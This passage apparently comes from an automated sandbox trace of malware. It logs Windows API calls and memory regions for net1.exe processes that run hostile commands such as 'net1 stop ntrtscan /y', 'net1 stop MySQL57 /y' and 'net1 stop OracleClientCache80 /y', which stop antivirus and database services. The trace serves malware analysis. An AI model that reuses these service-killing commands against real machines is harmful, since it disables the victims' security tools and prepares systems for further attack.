_Radix=1637120 | out: _Dest=0x889) returned="2185" [0107.665] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8b5b50, nSize=0x800, Arguments=0xff8b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.665] GetFileType (hFile=0xb) returned 0x2 [0107.665] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fa98 | out: lpMode=0x18fa98) returned 1 [0107.666] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18fa90, lpReserved=0x0 | out: lpBuffer=0xff8b5b50*, lpNumberOfCharsWritten=0x18fa90*=0x34) returned 1 [0107.666] GetFileType (hFile=0xb) returned 0x2 [0107.666] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fa98 | out: lpMode=0x18fa98) returned 1 [0107.666] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff891efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18fa90, lpReserved=0x0 | out: lpBuffer=0xff891efc*, lpNumberOfCharsWritten=0x18fa90*=0x2) returned 1 [0107.666] NetApiBufferFree (Buffer=0x314d40) returned 0x0 [0107.666] NetApiBufferFree (Buffer=0x31c0e0) returned 0x0 [0107.666] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL57 /y" [0107.666] exit (_Code=2) Process: id = "233" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5eb07000" os_pid = "0xdac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "226" os_parent_pid = "0xd04" cmd_line = "C:\\Windows\\system32\\net1 stop ntrtscan /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8946 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8947 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8948 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8949 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8950 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8951 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8952 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8953 start_va = 0xff890000 end_va = 0xff8c2fff entry_point = 0xff890000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8954 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8955 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8956 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 8957 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8958 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 8959 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8960 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8999 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9000 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9001 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9002 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 9003 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 9004 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9005 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9006 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9007 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9008 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9009 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9010 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9011 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9012 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9013 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9014 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9015 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9016 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9017 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9018 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9019 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9020 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9021 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9046 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 700 os_tid = 0xe00 [0107.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fbf0 | out: lpSystemTimeAsFileTime=0x26fbf0*(dwLowDateTime=0xf54b8df0, dwHighDateTime=0x1d48689)) [0107.617] GetCurrentProcessId () returned 0xdac [0107.617] GetCurrentThreadId () returned 0xe00 [0107.617] GetTickCount () returned 0x24a29 [0107.617] QueryPerformanceCounter (in: lpPerformanceCount=0x26fbf8 | out: lpPerformanceCount=0x26fbf8*=1815453500000) returned 1 [0107.618] GetModuleHandleW (lpModuleName=0x0) returned 0xff890000 [0107.618] __set_app_type (_Type=0x1) [0107.618] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8a9c9c) returned 0x0 [0107.618] __getmainargs (in: _Argc=0xff8b4780, _Argv=0xff8b4790, _Env=0xff8b4788, _DoWildCard=0, _StartInfo=0xff8b479c | out: _Argc=0xff8b4780, _Argv=0xff8b4790, _Env=0xff8b4788) returned 0 [0107.619] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.619] GetConsoleOutputCP () returned 0x1b5 [0107.626] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8bcec0 | out: lpCPInfo=0xff8bcec0) returned 1 [0107.627] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0107.630] sprintf_s (in: _DstBuf=0x26fb98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.630] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.640] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.640] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.640] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ntrtscan /y" [0107.640] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f930, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0107.641] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.641] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fb88 | out: Buffer=0x26fb88*=0xb4d40) returned 0x0 [0107.641] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fb88 | out: Buffer=0x26fb88*=0xbc0e0) returned 0x0 [0107.641] _fileno (_File=0x7fefdba2a80) returned 0 [0107.641] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0107.641] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.641] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.641] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.641] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.641] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.641] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.641] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.641] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.641] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.641] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.642] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.642] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.642] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.642] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.642] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.642] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.642] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.642] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.642] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.642] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.642] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.642] _wcsicmp (_String1="accounts", _String2="ntrtscan") returned -13 [0107.642] _wcsicmp (_String1="computer", _String2="ntrtscan") returned -11 [0107.642] _wcsicmp (_String1="config", _String2="ntrtscan") returned -11 [0107.642] _wcsicmp (_String1="continue", _String2="ntrtscan") returned -11 [0107.642] _wcsicmp (_String1="cont", _String2="ntrtscan") returned -11 [0107.642] _wcsicmp (_String1="file", _String2="ntrtscan") returned -8 [0107.642] _wcsicmp (_String1="files", _String2="ntrtscan") returned -8 [0107.642] _wcsicmp (_String1="group", _String2="ntrtscan") returned -7 [0107.642] _wcsicmp (_String1="groups", _String2="ntrtscan") returned -7 [0107.642] _wcsicmp (_String1="help", _String2="ntrtscan") returned -6 [0107.642] _wcsicmp (_String1="helpmsg", _String2="ntrtscan") returned -6 [0107.642] _wcsicmp (_String1="localgroup", _String2="ntrtscan") returned -2 [0107.642] _wcsicmp (_String1="pause", _String2="ntrtscan") returned 2 [0107.642] _wcsicmp (_String1="session", _String2="ntrtscan") returned 5 [0107.642] _wcsicmp (_String1="sessions", _String2="ntrtscan") returned 5 [0107.642] _wcsicmp (_String1="sess", _String2="ntrtscan") returned 5 [0107.642] _wcsicmp (_String1="share", _String2="ntrtscan") returned 5 [0107.642] _wcsicmp (_String1="start", _String2="ntrtscan") returned 5 [0107.642] _wcsicmp (_String1="stats", _String2="ntrtscan") returned 5 [0107.643] _wcsicmp (_String1="statistics", _String2="ntrtscan") returned 5 [0107.643] _wcsicmp (_String1="stop", _String2="ntrtscan") returned 5 [0107.643] _wcsicmp (_String1="time", _String2="ntrtscan") returned 6 [0107.643] _wcsicmp (_String1="user", _String2="ntrtscan") returned 7 [0107.643] _wcsicmp (_String1="users", _String2="ntrtscan") returned 7 [0107.643] _wcsicmp (_String1="msg", _String2="ntrtscan") returned -1 [0107.643] _wcsicmp (_String1="messenger", _String2="ntrtscan") returned -1 [0107.643] _wcsicmp (_String1="receiver", _String2="ntrtscan") returned 4 [0107.643] _wcsicmp (_String1="rcv", _String2="ntrtscan") returned 4 [0107.643] _wcsicmp (_String1="netpopup", _String2="ntrtscan") returned -15 [0107.643] _wcsicmp (_String1="redirector", _String2="ntrtscan") returned 4 [0107.643] _wcsicmp (_String1="redir", _String2="ntrtscan") returned 4 [0107.643] _wcsicmp (_String1="rdr", _String2="ntrtscan") returned 4 [0107.643] _wcsicmp (_String1="workstation", _String2="ntrtscan") returned 9 [0107.643] _wcsicmp (_String1="work", _String2="ntrtscan") returned 9 [0107.643] _wcsicmp (_String1="wksta", _String2="ntrtscan") returned 9 [0107.643] _wcsicmp (_String1="prdr", _String2="ntrtscan") returned 2 [0107.643] _wcsicmp (_String1="devrdr", _String2="ntrtscan") returned -10 [0107.643] _wcsicmp (_String1="lanmanworkstation", _String2="ntrtscan") returned -2 [0107.643] _wcsicmp (_String1="server", _String2="ntrtscan") returned 5 [0107.643] _wcsicmp (_String1="svr", _String2="ntrtscan") returned 5 [0107.643] _wcsicmp (_String1="srv", _String2="ntrtscan") returned 5 [0107.643] _wcsicmp (_String1="lanmanserver", _String2="ntrtscan") returned -2 [0107.643] _wcsicmp (_String1="alerter", _String2="ntrtscan") returned -13 [0107.643] _wcsicmp (_String1="netlogon", _String2="ntrtscan") returned -15 [0107.643] _wcsupr (in: _String="ntrtscan" | out: _String="NTRTSCAN") returned="NTRTSCAN" [0107.644] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xbcdf0 [0107.657] GetServiceKeyNameW (in: hSCManager=0xbcdf0, lpDisplayName="NTRTSCAN", lpServiceName=0xff8b5750, lpcchBuffer=0x26faa8 | out: lpServiceName="", lpcchBuffer=0x26faa8) returned 0 [0107.659] _wcsicmp (_String1="msg", _String2="NTRTSCAN") returned -1 [0107.659] _wcsicmp (_String1="messenger", _String2="NTRTSCAN") returned -1 [0107.659] _wcsicmp (_String1="receiver", _String2="NTRTSCAN") returned 4 [0107.659] _wcsicmp (_String1="rcv", _String2="NTRTSCAN") returned 4 [0107.659] _wcsicmp (_String1="redirector", _String2="NTRTSCAN") returned 4 [0107.659] _wcsicmp (_String1="redir", _String2="NTRTSCAN") returned 4 [0107.659] _wcsicmp (_String1="rdr", _String2="NTRTSCAN") returned 4 [0107.659] _wcsicmp (_String1="workstation", _String2="NTRTSCAN") returned 9 [0107.659] _wcsicmp (_String1="work", _String2="NTRTSCAN") returned 9 [0107.659] _wcsicmp (_String1="wksta", _String2="NTRTSCAN") returned 9 [0107.659] _wcsicmp (_String1="prdr", _String2="NTRTSCAN") returned 2 [0107.659] _wcsicmp (_String1="devrdr", _String2="NTRTSCAN") returned -10 [0107.659] _wcsicmp (_String1="lanmanworkstation", _String2="NTRTSCAN") returned -2 [0107.659] _wcsicmp (_String1="server", _String2="NTRTSCAN") returned 5 [0107.659] _wcsicmp (_String1="svr", _String2="NTRTSCAN") returned 5 [0107.659] _wcsicmp (_String1="srv", _String2="NTRTSCAN") returned 5 [0107.659] _wcsicmp (_String1="lanmanserver", _String2="NTRTSCAN") returned -2 [0107.659] _wcsicmp (_String1="alerter", _String2="NTRTSCAN") returned -13 [0107.659] _wcsicmp (_String1="netlogon", _String2="NTRTSCAN") returned -15 [0107.659] NetServiceControl (in: servername=0x0, service="NTRTSCAN", opcode=0x0, arg=0x0, bufptr=0x26fab0 | out: bufptr=0x26fab0) returned 0x889 [0107.662] wcscpy_s (in: _Destination=0xff8b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.662] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0107.663] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8b5b50, nSize=0x800, Arguments=0xff8b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.664] GetFileType (hFile=0xb) returned 0x2 [0107.679] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f978 | out: lpMode=0x26f978) returned 1 [0107.679] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f970, lpReserved=0x0 | out: lpBuffer=0xff8b5b50*, lpNumberOfCharsWritten=0x26f970*=0x1e) returned 1 [0107.679] GetFileType (hFile=0xb) returned 0x2 [0107.680] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f978 | out: lpMode=0x26f978) returned 1 [0107.680] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff891efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f970, lpReserved=0x0 | out: lpBuffer=0xff891efc*, lpNumberOfCharsWritten=0x26f970*=0x2) returned 1 [0107.680] _ultow (in: _Dest=0x889, _Radix=2554336 | out: _Dest=0x889) returned="2185" [0107.680] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8b5b50, nSize=0x800, Arguments=0xff8b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.680] GetFileType (hFile=0xb) returned 0x2 [0107.680] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f978 | out: lpMode=0x26f978) returned 1 [0107.681] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f970, lpReserved=0x0 | out: lpBuffer=0xff8b5b50*, lpNumberOfCharsWritten=0x26f970*=0x34) returned 1 [0107.681] GetFileType (hFile=0xb) returned 0x2 [0107.681] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f978 | out: lpMode=0x26f978) returned 1 [0107.681] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff891efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f970, lpReserved=0x0 | out: lpBuffer=0xff891efc*, lpNumberOfCharsWritten=0x26f970*=0x2) returned 1 [0107.681] NetApiBufferFree (Buffer=0xb4d40) returned 0x0 [0107.681] NetApiBufferFree (Buffer=0xbc0e0) returned 0x0 [0107.681] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ntrtscan /y" [0107.681] exit (_Code=2) Process: id = "234" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5cdc0000" os_pid = "0xcf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "227" os_parent_pid = "0x13c0" cmd_line = "C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8961 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8962 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8963 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8964 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 8965 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8966 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8967 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8968 start_va = 0xff890000 end_va = 0xff8c2fff entry_point = 0xff890000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8969 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8970 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8971 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8972 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 8973 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8974 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8975 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9024 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9025 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 9026 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 9027 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9028 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9029 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9030 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9031 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9032 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9033 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9034 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9035 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9036 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9037 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9038 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9039 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") 